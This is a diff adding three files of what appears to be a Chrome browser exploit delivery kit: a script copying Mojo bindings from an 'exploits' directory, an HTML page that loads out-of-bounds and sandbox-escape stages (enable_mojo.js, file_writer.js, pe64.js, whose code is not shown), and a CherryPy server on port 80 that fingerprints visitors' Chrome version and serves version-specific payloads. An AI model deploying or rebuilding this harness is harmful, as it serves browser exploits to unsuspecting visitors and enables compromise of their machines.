edxsh
diff --git a/‎copy_needed_bindings.py
+63 b/‎copy_needed_bindings.py
+63
diff --git a/‎index.html
+70 b/‎index.html
+70
diff --git a/‎server.py
+47 b/‎server.py
+47
@@ -0,0 +1,63 @@
+#! /usr/bin/python
+
+import jsmin
+import os
+import re
+import shutil
+import sys
+
+version = '71.0.3578.98'
+
+needed_bindings = [
+  'components/services/filesystem/public/interfaces/types.mojom.js',
+  
+  'mojo/public/js/mojo_bindings.js',
+  
+  'mojo/public/mojom/base/big_buffer.mojom.js',
+  'mojo/public/mojom/base/file.mojom.js',
+  'mojo/public/mojom/base/file_error.mojom.js',
+  'mojo/public/mojom/base/file_path.mojom.js',
+  'mojo/public/mojom/base/file_info.mojom.js',
+  'mojo/public/mojom/base/string16.mojom.js',
+  'mojo/public/mojom/base/time.mojom.js',
+  'mojo/public/mojom/base/unguessable_token.mojom.js',
+
+  'services/network/public/mojom/data_pipe_getter.mojom.js',
+  'services/network/public/mojom/http_request_headers.mojom.js',
+  'services/network/public/mojom/mutable_network_traffic_annotation_tag.mojom.js',
+  'services/network/public/mojom/network_param.mojom.js',
+  'services/network/public/mojom/url_loader.mojom.js',
+  'services/network/public/mojom/url_loader_factory.mojom.js',
+  
+  'third_party/blink/public/mojom/blob/blob.mojom.js',
+  'third_party/blink/public/mojom/blob/blob_registry.mojom.js',
+  'third_party/blink/public/mojom/blob/blob_url_store.mojom.js',
+  'third_party/blink/public/mojom/blob/data_element.mojom.js',
+  'third_party/blink/public/mojom/blob/serialized_blob.mojom.js',
+  
+  'third_party/blink/public/mojom/filesystem/file_system.mojom.js',
+  'third_party/blink/public/mojom/filesystem/file_writer.mojom.js',
+  
+  'url/mojom/origin.mojom.js',
+  'url/mojom/url.mojom.js',
+]
+
+def minify(src_path, dst_path):
+  data = ''
+  with open(src_path, 'r') as tmp:
+    #data = jsmin.jsmin(tmp.read())
+    data = tmp.read()
+  with open(dst_path, 'w') as tmp:
+    tmp.write(data)
+
+src_base = '/ssd/chrome_{}/src/out/Release/gen'.format(version)
+src_base = '/ssd/exploits_new/chrome/file_writer/winrel'
+dst_base = './win_{}/'.format(version)
+for file in needed_bindings:
+  src_path = os.path.join(src_base, file)
+  dst_path = os.path.join(dst_base, file)
+  try:
+    os.makedirs(os.path.dirname(dst_path))
+  except:
+    pass
+  minify(src_path, dst_path)
@@ -0,0 +1,70 @@
+<html>
+  <body>
+    <pre id='log'></pre>
+    <script>
+var keep = [];
+
+function print(string) {
+  var log = document.getElementById('log');
+  if (log) {
+    log.innerText += string + '\n';
+  }
+}
+
+function hex(value, count) {
+  const alphabet = '0123456789abcdef';
+  var result = '';
+  for (var i = (count / 4) - 1; i >= 0; --i) {
+    result += alphabet[(value >> (i * 4)) & 0xf];
+  }
+  return result;
+}
+
+function hexdump(view, base=0n) {
+  output = '';
+  ascii = '';
+  for (var i = 0; i < view.byteLength; ++i) {
+    if (i % 16 == 0) {
+      output += (base + BigInt(i)).toString(16) + ':  ';
+    }
+    byte = view.getUint8(i);
+    output += hex(byte, 8) + ' ';
+    if (0x20 <= byte && byte <= 0x7e) {
+      ascii += String.fromCharCode(byte);
+    } else {
+      ascii += '.';
+    }
+
+    if (i % 16 == 15) {
+      output += ' ' + ascii + '\n';
+      ascii = '';
+    }
+  }
+
+  if (i % 16 != 15) {
+    for (var j = i % 16; j < 16; ++j) {
+      output += '   ';
+    }
+    output += ' ' + ascii + '\n';
+  }
+
+  return output;
+}
+    </script>
+    <script src="/mojo/public/js/mojo_bindings.js"></script>
+    <script src="/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
+    <script src="/third_party/blink/public/mojom/filesystem/file_system.mojom.js"></script>
+    <script src="/many_args.js"></script>
+    <script src="/pe64.js"></script>
+    <script src="/enable_mojo.js"></script>
+    <script src="/file_writer.js"></script>
+    <script>
+let oob = new many_args();
+if (typeof(Mojo) !== "undefined") {
+  file_writer(oob);
+} else {
+  enable_mojo(oob);
+}
+    </script>
+  </body>
+</html>
@@ -0,0 +1,47 @@
+import cherrypy
+import os
+import os.path
+import re
+
+def chrome_version():
+  ua = cherrypy.request.headers['User-Agent']
+  match = re.search('Mozilla\/5\.0 \(X11; Linux x86_64\) AppleWebKit\/\d+\.\d+ \(KHTML, like Gecko\) Chrome\/(\d+\.\d+\.\d+\.\d+) Safari\/\d+\.\d+', ua)
+  if match is not None:
+    return match.group(1)
+  match = re.search('Mozilla\/5\.0 \(Windows NT 10\.0; Win64; x64\) AppleWebKit\/\d+\.\d+ \(KHTML, like Gecko\) Chrome\/(\d+\.\d+\.\d+\.\d+) Safari\/\d+\.\d+', ua)
+  if match is not None:
+    return 'win_' + match.group(1)
+
+def chrome_version_path(path):
+  return os.path.join('./', chrome_version(), path)
+
+class Server(object):
+  def _cp_dispatch(self, vpath):
+    path = os.path.join(*vpath)
+    cherrypy.request.params['file'] = path
+    for i in range(len(vpath)):
+      vpath.pop()
+    return self
+
+  @cherrypy.expose()
+  def index(self, file=None):
+    version = chrome_version()
+    if not os.path.isdir(version):
+      return '<html><body><div>Chrome version {} not supported...</div></body></html>'.format(version)
+    elif file is None:
+      with open('index.html', 'r') as tmp:
+        return tmp.read()
+    else:
+      with open(chrome_version_path(file), 'r') as tmp:
+        return tmp.read()
+
+cherrypy.config.update({
+  'log.screen': False,
+  'server.socket_port': int(80),
+  #'server.socket_host':'127.0.0.1'
+  'server.socket_host':'0.0.0.0'
+})
+
+cherrypy.tree.mount(Server(), '/')
+cherrypy.engine.start()
+cherrypy.engine.block()